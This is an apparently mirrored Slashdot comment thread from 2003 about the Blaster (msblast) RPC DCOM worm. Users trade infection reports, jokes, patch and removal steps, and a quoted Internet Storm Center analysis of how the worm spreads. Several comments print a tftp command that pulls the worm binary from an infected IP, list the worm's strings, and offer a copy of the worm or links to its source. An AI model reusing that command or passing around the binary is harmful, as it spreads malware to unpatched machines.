Slashdot Mirror
RPC DCOM Worm On The Loose
GPez writes "The first of I'm sure many RPC DCOM worms affecting Windows is on its way, according to the Internet Storm Center. Patch those systems!" According to the site, "The worm uses the RPC DCOM vulnerability [affects Win2k through Server 2003] to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp."
The security team at my office has been scrambleing to secure all of our systems before such a worm was developed. I hope they are done!
Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?
Visualize the world of wine
It's been hitting efnet for the past week. I've seen plenty of people in lots of channels infected, and it's a pain helping people clean up their systems. This one is a big mess.
If you have Linux, then just ignore this article.
Is it opening a shell on port 4444 or a tftp server?
It's called a firewall. It's proteced me from Nimda, Code Red, etc.
Karma: The shiznight, mostly because I am the Drizzle.
no need to reboot any time soon for that old windows 98 part since Im a linux junkie by now hehehe
Developers developers developers..
...
erm...
security security security... erm
um...
somebody get me more cocain!
the call centre here is off the scale with people ringing in with rpc problems...
all xp users though
"I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
At least Microsoft was nice enough to credit LSD in the tech note.
Learning HOW to think is more important than learning WHAT to think.
if you use this vunerability against someone (usually people that hit your web server with /default.ida) you get access to a C:\ prompt. You can look around, run format, etc.
It's quick to crash the machine (apparently) as the remote becomes unusable (pingable though).
It's actually pretty nasty from what I have seen... I just wonder how effective the worm will be when the machine becomes unresponsive after a few commands?
Perhaps it won't spread as fast as others because of this problem? I suppose we can hope.
Developers: RPC DCOM Worm On The Loose
Shouldn't that be:
Developers, Developers, Developers, Developers, Developers, Developers, Developers, Developers, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!: RPC DCOM Worm On The Loose
After watching all the message traffic on the full-disclosure list about this exploit I knew a worm would be forthcoming. This is a fairly easy to abuse exploit and with all the unpatched systems out there I can only imagine the possible growth this worm might experience.
I was *just* surfing D-Shield and was reading a notice about a captured worm. Sure enough, as soon as this article appeared.. the site is DOWN.. that really is something to see, even I get shocked every now and again.
Intelligent Life on Earth
I work at one of the nation largest ISP tech support call centers. Our call volume is going through the roof today.
After reading the advisory, it looks like this one is going to be a bad one. I'm no expert, but I would guess that this thing is going to be around as long as code red was (and I'm still getting code red hits in my logs!)
And the government thinks Windows is more secure than SuSE Linux? Riiight.
This worm is bugged it seems. From XP systems I have seen it throws an error to the screen about RPC services and reboots the system. On Windows 2000 Pro it crashes the svchost and a lot of stuff stops working. Just and FYI for those trying to diagnose systems right this minute.
Cagliostro
Papa Legba come and open the gate
UNC-Chapel Hill South Campus [Medicine, Pharmacy, Nursing, etc] has been slammed by this thing.
The tragic part is that Microsoft posted the patch almost a month ago:
I was working on my parents compter (Windows XP) remotely today when this started happening. I was installing some new software for them and I had also just disabled that stupid Messenger service so they would stop getting those pop-up spam messages.
:)
Anyhow, I had just finished that when XP said it was shutting down in 30 seconds. I was like, WTF!
Here I am thinking that I just screwed up their machine with the new apps somehow.
Thanks a bunch, Billy. Guess they'll be punting this one to Longhorn
Thinking that there has already for some time been a few "non-secret" exploits floating around in the wild for this it was just a matter of time.
;)
So I guess all windows security holes will lead to worms in the future? Maybe they should start calling heavy-load proof networks "worm-load proof" instead?
Incoming!!!! Oh, wait a second...
This thing runs using the DCOM-RPC protocol right? I got that port blocked at the firewall, any attempt to touch the port is just ignored.
Of course the patch will help if somehow it gets inside, but still...
I don't trust microsoft for my windows security when on the net... I trust linux.
On Arrakis: early worm gets the bird. Magister mundi sum!
I downloaded this patch for Windows 2000 then checked my local hotfix directory and found I had already applied this days ago.
/. article is about what is happening to those who haven't patched. Kinda like watching the poor sobs fight lions in the gladitorial pits for education.
So I guess this
Hello everyone ..
... Seems a worm has been released. We have received a number of calls about peoples systems shutting down with the following error: NT Authority System .. ect ect.
:)
I work for a small ISP
And the computer restarts.. This happens about every 40-60 Seconds making it "almost" impossible to Patch the Computer. Just a heads up for ANY IT Guys out there
http://secur1ty.net/dcom.cgi
Check to see if you're vulnerable.
This is our number of dropped TCP 135 requests at our border since noon today, per 30 mins, seen on our 2 Class Bs:
57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700
milspec
Affected Software:
* Microsoft Windows NT(R) 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server(TM) 2003
Not Affected Software:
* Microsoft Windows Millennium Edition
finally! all these years of running Win ME have paid off! so long suckers!
OMG! It's not a worm, ITS SKYNET! It's taking over! Make your time, judgement day is nigh!
I've been digging around the web, and I can't seem to find out how to protect myself. I can't seem to find anything that prevents this virus from attacking my linux or as/400 servers. Help!
Got hit by this earlier today, I'm not normally a slouch with these things but this one really hit me hard, took me 4 restarts to find out what was going on. (As every time I connected to the net I was immediatly given 60 seconds before another auto restart) I can see how non-techies are gonna be totally screwed by this.
:)
All I can say is change the properties of your RPC service repair functions. Start -> Administrative Tools -> Component Services -> Services (local). this will at least give you time to go online and download the MS patch, which we should have done weeks ago I know
I wonder if this is why most of Sweden's ADSL connections are down ATM :(
replace worm.exe with safe.exe or something. Maybe we can even put a linux installer on there and "convert" some to the safe computing world.
http://isc.sans.org/diary.html?date=2003-08-11
http://www.kb.cert.org/vuls/id/326746
win2k machines are still vulnerable to a dos; even patched.
Thanks microsoft...
I've heard rumours that China has plenty unpatched machines. Maybe they intend to use the firewall to block those Mongolian RPC invaders!
If we don't believe in freedom of expression for people we despise, we don't believe in it at all. -Chomsky
Anti SCO T-Shirt. $1 donated to OSI Fund on each shirt.
My JBoss server was listening on port 4444, so I got a call from the IS guys who thought my PC was compromised.
I work at a Microsoft call center :-(
Everybody keeps posting that they have this or that port blocked on their firewall, so they're safe. Not so. All it takes is one person inside your network to open the wrong file attachment, or one laptop that went outside the network and then came back in to infect your internal network.
I suggest the "Trustworthy Computer"
W32.Blaster.Worm http://www.symantec.com/avcenter/venc/data/w32.bla ster.worm.html
Someone should change the worm to make it reboot the machine - that'll larn 'em :O)
Get your own free personal location tracker
You did say this was a RPG worm, right?
It looks like the worm affects svchost.exe (the Generic Host Process), and keeps restarting the computer. At first I thought that some of my hardware was failing, but after reading dozens of posts on Usenet about similar problems, I wasn't really sure. So I researched a bit on Google, and found the MS security bulletin. After patching my system, the problems seem to have gone. I guess I should have followed more closely Microsoft's security announcements.
So, if you have strange issues with the RPC, or are experiencing similar symptoms as I have, patch up now!
My computer started rebooting itself this afternoon stateing .. "windows must now restart because the Remote Procedure Call (RPC) service terminated unexpectedly"
I figured it was a new worm!
The Good Life
Are there really that many win2k systems not even running SP3? That's not the only fix, but I have a box here that has had zero patches except SP3 and DCOM is disabled by default - which pretty much makes this "buffer overflow" a non issue. Doesn't XP also install (by default) DCOM disabled? So where is all this traffic coming from? People too nervous to install SP3? People too stubborn to stop using NT4?
Does anyone know if WINE supports this worm yet? I would like to test it out but I don't have Windows on my desktop.
Thanks.
A friend of mine called me about 3 hours ago saying that her brand new Windows XP notebook kept rebooting with some strange message about RPC. I had her download the free version of ZoneAlarm and that blocked the worm and let her stay online long enough to download the patch. If you know somebody that's getting hammered, have them give ZoneAlarm a shot.
Free Mac Mini. Yes, I'm
On XP you are getting two error codes.
The first is a system shutdown window tellign you that the RPC service must be restarted,. This gives you 30 seconds before reboot. Iniated by NT Authority\system. This is a succesful XP infection
The other is Windows cannot open this file:
File: TFTp784
This appears to be an unsuccesful try.
For windows 2000 it crashes svchost trying to get in it appears. Just apply the patch to stop the crashes. It does not appear to get into the system in this case
Hope this helps everyone
Cagliostro
Papa Legba come and open the gate
I just noted something I liked from the article... Just to make things more fun they suspect that it also starts a synflood attack on windowsupdate.com, meaning it is a worm that tries to make it hard to get the patch to fix things... I find that funny, almost as good as the suggestion for a virus/worm to actually _do someting_ damaging to a system to convince people this is not a joke.
Anyway
On Arrakis: early worm gets the bird. Magister mundi sum!
And our users are getting POUNDED by this.
"YOU BASTARDS KEEP DISCONNECTING ME!"
"Comedy's a dead art form. Now tragedy, that's funny."
This is my first post - I'm just posting to say, that at about 1:00am today, I already found MSBlast.exe on my computer after a series of RPC errors. I patched using a file you can find in MS database: http://www.microsoft.com/technet/treeview/?url=/te chnet/security/bulletin/MS03-026.asp
And after cleansing my computer (and loading up Tiny Firewall 5.0) the problem is fixed.
Also a helpful hint in case you need it:
If you recieve an RPC error and a countdown is started to shut your computer down, then go to start>run and type "shutdown /a" and that will stop the countdown.
Hope this helps someone at least.
"trusted computing"
thank god i dont have a c: drive, i have everything set to d:/ :) hahaha!
First worm? Nope. Second? Not even. I work at a university and we have been running around for a week now patching systems and fixing worms that started last week. They have hit NT 4 and 2000 machines. We found them by chance, but they are installing all sorts of things. Trojan.stealther is the one that hit hardest, on all unpatched 2000 machines. So this is not the first worm at all. They have been out in the wild for at least a week now, and we are now patching and fixing all the many hacked or vulnerable systems.
Enable Internet Connection Firewall, apply patch, remove virus :-)
The first is necessary because it is the buffer overrun which reboots the computer.
LedgerSMB: Open source Accounting/ERP
My girlfriend called me not 20 minutes before this article went up asking what RPC was and why it was shutting her computer down whenever she got on the Internet. A quick glance at this article's headline followed by a thorough read of symmantec's removal instructions led to me calling her back and another day saved! Thanks, Slashdot! Thanks, Symmantec Security Response Team!
I don't really look at Windows security updates, but why the HELL don't they put these patches on Windows Update? The reason that these worms spread is because NORMAL people (and idiot sysadmins) don't go and read these security updates.
/. cover the other 20 of these things?
I have WinXP SP1 installed, with all the updates and critical security fixes installed. I just go look here and I see that there are 21 extra updates I should install. All of them are remote exploits as well.
I will say that I am surprised, I thought I had been staying up-to-date. I don't do Windows server administration, so I didn't know about these. I Windows for my desktop, naturally. But I really don't understand why they don't go ahead and put this crap on Windows Update? Are they afraid of the bad press? Everyone and their goldfish knows that MS is insecure anyway, they may as well put it there.
Bleh. Why didn't
www.sitetronics.com/wordpress
Another comment was right - poorly configured firewalls will result in a HUGE problem. Here's the fix:
n and take out msblast there. Then run the patch from this site:
b cf ad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980 -x86-ENU.exe
Control-Alt-Delete to get to Task Manager. Look for a process msblast. Kill that process. Using Task Manager, start a new process called regedit. Using regedit, navigate to HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
http://download.microsoft.com/download/9/8/b/98
Restart. That should do it.
I just checked, and it has been hit 63 times in the last four hours. I would not run XP without good ol' ZA...
Sure there's a bug now. But Microsoft picking DCE RPC for DCOM was a nice thing for the open source community since its a documented protocol. There's a project supporting it on Linux: freedce. I have used freedce to communicate between Linux and Windows. It's nice.
have a look at : http://security.tombom.co.uk/shatter.html
it is worth reading.......
At first, I couldn't figure out why Task Manager suddenly stopped working. Launching TaskMan.exe resulted in an error message "Task Manager has been disabled by the Administrator".
.dll file, delete them.
Odd, I thought. I *am* the administrator.
I realized I had been hit by a virus or worm when I rebooted and the autoexec.bat file opened up during my login. Not good.
Norton didn't pick up on this one at all; furthermore, McAfee's online virus/worm searching tool found a related virus, but not the actual baddie.
The virus that McAfee located - which probably came in after the worm opened up all those ports in my firewall - were in \WINNT\msagent\intl. Basically, anything in that directory that *isn't* a
The worm itself is in \WINNT\system32\, and is called 'msconfig[nn].exe', where [nn] is interchangeable with two numbers. Mine was 'msconfig35.exe', I've read reports on various forums of others w/ '32' and '33' after the 'msconfig'.
Be careful here, as this app will spawn identical, hidden copies of itself with random names (like 'dwigjenjig.exe' or 'zajdfanltef.exe'). The easiest way I found to discern between real MS files and the worm was by looking at the last modified date displayed by Explorer, vs the last modified date that pops up when you mouse over the file name. All of the worm files had discrepancies between the two.
Hope that helps someone out there!
Comcast's being hammered with calls to their tech support line. The entire network is bogged down nationwide, due to an issue "Affecting Windows XP, Windows 2000, and Windows NT systems".
Their technicians are working with Microsoft to resolve the issue.
Knowing Comcast, that means they'll be up and running at full speed again in, oh, January next year at the soonest.
Just because you can mod me down, doesn't mean you're right. Shoes for industry!
Somebody must be taking all the calls, because I'm sitting here in our HP call center, and nobody's printer has been broken allllllllll day. I'm assuming they all have their hands full. =)
And Cal(Berkeley) is blocking their network from outside access starting today for four days. Makes me wonder how many other large networks have been compromised, but don't know it.
I'm glad I don't work at Stanford.....don't envy them having to wipe 2,400 machines and sort through files that need to be replaced.....trying to avoid trojans, etc
Saw this discussion on the NANOG list.
MoFscker
What happens to your computer if you get this worm? My friends Xp box just went flaky, when you boot it up it says it has some kind of RPC problem then shuts down after some 30 seconds.
I asked another friend of mine if you could just put the recovery cd in reinstall the OS, but he wasn't willing to take a chance hosing his data.
Anyway I'm headed up to his place later today with knoppix in hand to burn him some cd's of his data so he can do a reinstall. He is freaking out since all of his invoices are on that computer and supposed to go out tommorrow. Gotta love that knoppix!
~50 hits on my router in just the last half-hour or so, 90% of them from Rochester and NYC RoadRunner addresses.
I have a feeling this worm will hit especially hard on home broadband users that never touch Windows Update.
I suggest you use GRC.com's excellent port scan feature if you got a Windows machine. It's called 'Shield's UP!' and is available here (scroll down a bit), and will scan your system's first 1052 ports.
...then could you use it to disinfect the system? Or at least notify the owner of the box, by making a txt file at the desktop or something.
HAHAHA. That is so funny. Windows Sux
So i load up my /. as my homepage, take a look at the first headline, RP-What? Read up a bit, go: "Huh, that's interesting" and head off to my email site. Bam! i get pegged with this worm and my computer shuts down. For anyone else in the same boat as me, you can still download the patch using the infected computer by typing: services.msc there will be two services listed that are directly linked to this worm under the Remote Procedure Call heading, just look threw the list in the standard tab. You can by pass it by going into teh properties and changing the crash executions do "Do nothing" instead of restarting your computer. I was able to download the patch via the website and am now looking for a way to rid myself of this worm. Firewalls eh? I've heard of them, but then what else am I going to do in my spare time?
Anybody know good Internet traffic type sites where you can watch this unfold? I found one showing that Asia seems to be experiencing some troubles, but I'm not sure how accurate or good the info is.
For great justice!!!
I've said it before, and I'll say it again.
While there is no excuse for not updating your systems, some people can't do so because of business policy reasons (non-tested patches against business critical systems).
EVERYONE with a server on the internet should also have Egress filtering in place. 486 mahcines are cheap. Unix/Linux firewalls are free. On the off chance you do get the M$ IS$ Worm of the week, at least your server can't initiate an outgoing connection to download more code and move on to the next system.
To keep this worm from coming to full fruition, you also have to edit your registry and delete the msblast.exe file from your system32 folder. I want to go back home to my linux box and just forget this day ever happened...
am I missing something? why is this +4, funny?
Just for everyones ammusement, a major life insurance company, in Milwaukee, closed its port 135 when the announcment came out several weeks ago. But some idiot, went and ran an unknown attachment on an email and now 5000 field employee computers were crippled.
Its just too funny.
tftp -i 217.211.179.193 GET msblast.exe
... lets slashdot them :) -that would slow the growth...
(use any of the ips listed on http://isc.sans.org/diary.html?date=2003-08-11)
mabye its too late.
if you wish to analyse it a little, you can simply upx -d msblast.exe to unpack it...
Just FYI, I've confirmed on my system that at least some of the parent's information is true. I got hit around 2pm Dallas time, and I've now got a file called msblast.exe in c:\winnt\system32 with a file length of 6176 bytes.
After the "to say LOVE YOU SAN!!" string, I find these words: bill gates you make hi possi. And before it, it looks like it says "I ju wan to say" (with control characters that may or may not be of interest).
Sure enough, Symantec has some info now, too (just sent by someone in my co.).
Timing sucks on this one -- I'm right in the middle of coding for 3rd quarter tax changes. Crap!
Stressed? Me? Of course not. Stress is what a rubber band feels before it breaks, silly.
The latest Win2k service pack is SP4, you know...
(This was released about 2 months ago, IIRC.)
void*x=(*((void*(*)())&(x=(void*)0xfdeb58)))();
We need more jobs in order to keep the jobless programmers from getting bored out of their skulls and creating worms.
And, we need to start making homework more interesting. I mean, really interesting. Totally, undeniably fascinating at that.
Well, it's a start. Any ideas on the latter? Because I'm absolutly clueless.
People discover the meaning of life between getting piss drunk and the following hangover.
If you look at the security bulletin, it was issued on 16 July. The fix has been out for a month, and my work machine (XP) was installed on the same date via Windows Update.
While I love to bash MS as much as the next guy on SlashDot, this isn't news.
The only reason we have the rights we have is that people just like us died to gain those rights. -- Cheerio Boy
let the "*nix is better" jokes begin.
Parent poster is obviously pretending to be MS employee....
Nice joke though....
Wow, slashdot (the editors) is putting way more emphasis on serious bugs in Windows than Linux, *bsd, or anything else.
:)
The reason being, of course, that the last worm to hit "Linux, *bsd or anything else" as hard as this RPC worm (or Nimda, etc.) hit Windows was the Morris worm.
They did this already last week on Stargate SG1 with that virus that spread from gate to gate and took down the whole network in 2+ hours. Can't these virus writers ever come up with something original?
-- Thou hast strayed far from the path of the Avatar.
Internet Storm Center is getting hammered, so I attach their analysis.
u n, name: 'windows auto update'
\ Run
NOTE: the scanning is being done Code Red style, so it is concentrating on the class B pseudo-subnet, e.g. 123.123.x.x. If this gets inside your corporate firewall then you are screwed.
I count about 1 scan every 10 seconds at present.
--x8 Cut here ----
This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.
**********
NOTE: PRELIMINARY. Do not base your incidents response solely on this writeup. **********
Increase in port 135 activity: http://isc.sans.org/images/port135percent.png
The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000 and XP.
The worm uses the RPC DCOM vulnerability to propagate. One it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.
Infection sequence: 1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
2. this causes a remote shell on port 4444 at the TARGET
3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,
4. the target will now connect to the tftp server at the SOURCE.
The name of the binary is msblast.exe. It is packed with UPX and will self extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
So far we found the following properties:
- Scans sequentially for machines with open port 135, starting at a presumably random IP address
- uses multiple TFTP servers to pull the binary
- adds a registry key to start itself after reboot
Name of registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\R
Strings of interest:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
Never email donotemail@WeAreSpammers.com
Step 1. Shut down PC Step 2. Disconnect Network Step 3. Start up PC Step 4. Click Start -> Settings -> Control Panel Step 5. Double Click Network Connections Step 6. Right Click the Local Area Connection used to access Internet. Example: Local Area Connection 1 Step 7. Select Properties Step 8. Click the Advanced Tab Step 9. Enable the Windows XP Firewall Step 10. Click OK, Close out of open windows. Step 11. Plug in the network again. Step 12. Ensure Connection is stable Step 13. Open Internet Explorer Step 14. Go to the following URL: http://www.microsoft.com/technet/default.asp Step 15. Click the Link toward the middle of the page titled: Action: Read Security Bulletin MS03-026 and Install the Security Patch Immediately Step 16. Scroll Down Page about half way to Patch Availability Step 17. Click Windows XP 32 bit Edition Step 18. Click Download in the upper right of the screen. Step 19. Save the file to the desktop Step 20. Run the downloaded file. Step 21. The patch will install and prompt the customer to reboot. Step 22. Once the patch is installed and the computer rebooted, the Windows XP firewall can be disabled and the customer can surf normally.
If you get the pop up giving you 60 seconds to shutdown and it's causing you hassle running the patch (ie, it happens everytime you boot) then I hear you can stop the shutdown sequence by opening command prompt and typing 'shutdown -a'
Whether this works or not I don't know as I managed to pach mine. Hope this may be of some help.
"Dre don't get as high as me.... I'm Cheech and Chong" - Snoop Dogg
I have a problem, a lot of my users work in remote offices which I can't touch. I don't trust all of them to apply patches on their own, I'm not quite sure what I'm gonna go about this. Hell, it's hard enough to have people actually read the e-mails we send out in the first place. Any suggestions?
Hate to say it, but the built in internet connection firewall in XP was dead handy - I couldn't stay online long enough to download the patch without being restarted, so i turned it on before connecting, and no problems since...
Darn, I really need to configure wingate properly, thought i had it tight...
i cant believe i went *3* reboots before turning off the error message - thats right! then i read about this worm. too much bf1942, not enough /. - the moral of the story.
Step 1. Shut down PCp 15. Click the Link toward the middle of the page titled: Action: Read Security Bulletin MS03-026 and Install the Security Patch Immediately
Step 2. Unplug Cable Modem.
Step 3. Start up PC
Step 4. Click Start -> Settings -> Control Panel
Step 5. Double Click Network Connections
Step 6. Right Click the Local Area Connection used to access Internet. Example: Local Area Connection 1
Step 7. Select Properties
Step 8. Click the Advanced Tab
Step 9. Enable the Windows XP Firewall
Step 10. Click OK, Close out of open windows.
Step 11. Plug in the Cable Modem.
Step 12. Ensure Block Sync is established.
Step 13. Open Internet Explorer
Step 14. Go to the following URL: http://www.microsoft.com/technet/default.asp
Ste
Step 16. Scroll Down Page about half way to Patch Availability
Step 17. Click Windows XP 32 bit Edition
Step 18. Click Download in the upper right of the screen.
Step 19. Save the file to the desktop
Step 20. Run the downloaded file.
Step 21. The patch will install and prompt the customer to reboot.
Step 22. Once the patch is installed and the computer rebooted, the Windows XP firewall can be disabled
Anyone find it ironic that the patch requires you to restart windows? Hehehe...
I work in tech for a local/regional ISP that has about 10k customers. Our phones are getting slammed pretty good with people saying "my computer is shutting down.. something to do with RPC blahblah" (our users aren't very smart, as if that's a revelation).
:(
This problem is real, and it seems pretty nasty so far. We're probably getting 40-50 calls an hour for the last 4-5 hours just on the RPC problem. That's a pretty good jump from maybe 10-15 calls an hour on average total.
I know I'm not having a good monday at work so far
I work at a pc support center and our phones went off the hook. Best bet was to either disable the RPC service, or enable the Win XP firewall and get the patch.
"Uh, WTF is SVCHOST.EXE, and why the fuck does it always bind itself to 445, and how can I make it stop doing that? I don't know what it's listening for, but I know that for what I'm using this box for, I don't need it, so why can't I disable the offending process?"
- Me, the first time I played with a W2K box.
"So SVCHOST does too much stuff to just kill it, but how can I at least stop it from binding to 445? I know I'm not doing anything on that port, and therefore don't want any process listening for data sent to it. Period."
- Me, after 5 minutes of trivial research.
"Crap, it looks like there's no way to stop SVCHOST from listening to 445. Guess I'd better install my favorite cheap-azz third-party software firewall and block it there. Once I've done so, I don't give a damn if SVCHOST still listens to 445, because unless there's a buffer 'sploit in the firewall software itself, SVCHOST won't get any of the traffic anyways."
- Me, after 5 more minutes.
"I knew this was gonna happen."
- Me, when I read about the DCOM hole last month.
Security is a process, not a product. The process is "Everything is forbidden except what is permitted. Run no services other than the bare minimum required to get the box to bring up a GUI. Run no services that listen to any network traffic unless explicitly started by the user."
Insecurity is a product, not a process. The product is "DCOM should be on by default because pointy-haired bosses won't be able to do $NEW_OFFICE_SUITE_FEATURE without it, nobody buys the OS for anything other than running Office and Outleak."
Repeat ad nauseam with IIS on/enabled by default (CodeRed), the ActiveX/scripting settings for MSIE (Drive-by downloads), the out-of-the-box UPnP vulnerability (port 1900), popup "spam" (port 135), etc.
Basically, every time M$ has the choice between security (Built shiny thing. Disable by default and have applications respond with an error message telling users how to turn shiny thing on if and only if the shiny thing is required by some user action), and stupidity (Oooooh, shiny thing! Enable by default and assume there are no bugs in the code anywhere!), Bill and friends have chosen stupidity.
According to this slashdot post it says Win2k - Win2k3 is affected. Microsoft's page says the exploit is available in NT4.
gives a rundown on how to remove it. http://securityresponse.symantec.com/avcenter/venc /data/w32.blaster.worm.html
-- troutsoup.com
here. Includes snort signature etc.
Didn't the RPC worm come out 2-3 weeks ago?
I went through the RPC worm shit 2 weeks ago. How is this news now? I've patched almost all of my boxes and am about finished with cleaning up the boxes that got missed and consequently hacked.
We're currently got 112 windows Xp lusers in our queue looking at a 2 hour wait time to talk to us virus removal techs. "Sorry, no removal instructions, call tomorrow." hehe
here is a copy of the worm client for those interested (17k rar).
be warned, this will mess up your system if you're not careful.
yes, i knowingly ran the worm, what can i say, i was bored/curious :)
this sig was brought to you by the letter
Is that the S word I see here?
http://www.microsoft.com/com/tech/DCOM.asp
A lot of people seem to think the executable is bugged, crashing the RPC service and causing Windows to shutdown. Seems like a good payload to me. In my example, my computer shut down within a few minutes. This makes it exceedingly hard for people to find information and download a patch to fix it, yet at the same time, the trojan is scanning and infecting others while you're trying to fix it. I was struggling to download the patch on modem, took about 5 shutdowns until I had it. Also, at this moment, the main cable provider in the UK seems swamped with this problem, and I don't think it'll go away fast.
I got a message from my friend on my ICQ that something was up. He gave me a link to http://microsoft.com/downloads/details.aspx?Family Id=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylan g=en
But I couldn't access the site, like I couldn't access many other sites. So he sent me the update through ICQ and I patched my Windows XP and rebooted.
After the reboot I haven't been able to connect to ICQ or MSN Messenger and I can only access a couple of sites (like this one, luckily). I tried restoring the system like it was before the patch, but then there still was the same problem so I patched it again.
I've used the windows search to see if I have the MSblast.exe file and it didn't find it.
Am I infected, or is it just that every other damn server I am trying to connect to is?
Sorry for the long post.
I am pretty surprised it got us. Our network guys do a really good job of preventing this stuff from getting in. But this one hit us hard. It slowly spread through the network. My co-worker was the first I know who got it. Then it hit mine, then others in my department. It would kill RPC every 15 minutes at first, which caused my machine to reboot. Right before I got rid of it, it was killing it 30 seconds after the system came back up. Fortunately, my brother was reading Slashdot and said "oh, that sounds like the RPC DCOM worm". Sure enough, that was the problem and just had to delete msblast.exe in my registry. And to those of you who have been saying "I don't have a problem, I use a firewall". Well, we are behind a firewall too (one that is managed better than most since we are government) and it still slipped in.
Support a great indie game: http://www.abaddon360.com
After manually updating my virus definitions and explicitly pointing NAV to the file, it still reckoned it's clean. Way to go, Norton. At least the MS patch seemed to work, although I've seen some people on IRC get repeatedly raped and always before they managed to download and install the patch. Sucks for them, I guess.
The worm, aptly named msblast.exe and happily sitting in my system32 folder, sending itsself to a bunch of random addresses (that happened to be in a reserved netblock and were timing out, go figure) was packed with UPX, after uncompressing and running strings on it here are some interesting finds:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Fun, hah? Way to go you bloody wanker, you made my day. I hope SAN (your right hand) loves you too.
Here's a link to the Mcafee site re: the worm. Here's a link to the source code of the worm.
SecurityFocus has an analysis for the worm here.
Three days ago I was installing XP onto my computer. During the file copy process, a couple files were corrupt and wouldn't copy, so I had to abort the process and reinstall Win98. Ironically, one of the files was RPCxxxx.dll!!!!
I really like the fact that the worm crashed my xp. Because i noticed at once something is wrong. And it keep crashing 1-5min after login into the net, so there war little chance for anyone to really use the exploit (thx to dynamic ip).
Cant imagine how much more packets would be flying around if all those crashing machines would be spamming the worm right now....
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?
Here's what a small POP at a dial-up wholesale provider looks 2 minutes after an ACL application. Keep in mind this is a small POP. We also blocked 4444.
deny udp any any range 135 netbios-ss (4735 matches)
deny tcp any any range 135 139 (16343 matches)
deny tcp any any eq 4444 (80 matches)
And to all of the pecee users out there get a mac
"We can dance if we want to, we can leave your friends behind. Cause your friends don't dance and if they don't dance.
if you read /., don't run a firewall, and then complain about M$, all i have to say is, "phtttbht." linux needs patching, unix needs patching, M$ needs patching...but this worm would not propagate with a properly configured firewall in place, making the security patch a little less critical.
the fact that people are getting hit with this worm indicates that there is simply not enough education about computer security out there, or that there is too much laziness from both consumers and software licensing companies.
this worm is not an issue to people with the correct closed ports...
man rtfm
If all of you windoze users would just switch over to a mac the world would be a much happier place. **Hugs Mac**
"We can dance if we want to, we can leave your friends behind. Cause your friends don't dance and if they don't dance.
Ive figured it was out there. All the people on shacknews that refuse to update their systems and think linux is only for l33t omfg Im cooler then j00 dudes have been asking for the last few days "what is tftp!!??"
Heh - Its like I tell all the crazy teens. If you are going to fuck like rabbits (ie use windows) then please use protection (firewall + patch patch and PATCH).
Oh well - live and learn!
Hmm...I wonder if my XBOX will start crashing whenever I try to play an online game... It does run a version of Win 2k, after all.
I'm only KIDDING, jeez!
around 11 - 12ish noon here in the midwest. Was wondering what was svchost.exe and why it was crashing so much.. thought I was alright after I installed SP3... thank god for slashdot. :-D
also called up tech support on my ISP, appears alot of activity on 135 been goin' on for past couple of weeks.
many thx to the user who posted the fix with the regedit and all.
(use "netstat" in the command prompt if you're unsure about things.. if you get hit with alot of "epmap"s .. thats prolly it. ctrl+alt+delete and take a look for the "msblast.exe" program.)
Try not to let life get in the way of living.
Besides, windowsupdate.com wouldn't have done me any good. It only seems to work in IE. I run Opera, you insensitive clods!
Stressed? Me? Of course not. Stress is what a rubber band feels before it breaks, silly.
That's not generic advice for the DCOM bug - for that you'll need to catch whichever of the MS ports are being abused this week. But it's guesswork advice for this particular instantiation of a worm that's exploiting it so you can at least slow down this one and isolate damage, and work on patching the actual holes in Windows so that you can prevent next week's worm that uses the same bug but some other inter-worm communication path from getting in.
At least on the couple of machines I've looked at, TCP 4444 isn't used for anything (there's a UDP 4444 used for Kerberos 4-to-5 conversion or something.) TFTP gets used for things like uploading operating system versions to diskless PCs and routers, and still isn't something you should be accepting from the outside world, and for the most part (YMMV) is only used by administrators who are better off stomping worms first and upgrading routerware later. The Microsoft ports are used by all kinds of Microsoft applications - you almost certainly should be blocking them to and from the outside world, but whether to block them inside your internal nets, and where, is a decision you'll need to make based on how much of which MS network products you're actually using. (e.g. you don't want to kill all your thin-client PCs by killing off their mounts of the file servers - but you also don't want them infecting each other.)
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Here's a work-around I've been talking some of my relatived through tonight. It's not something I'd normally want to expose them to, but it certainly saves me a visit to do it myself!
This quote is from Microsoft's web site regarding this vulnerability.
..."
"... Remote Procedure Call (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the Open Software Foundation (OSF) RPC protocol, but with the addition of some Microsoft specific extensions.
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP.
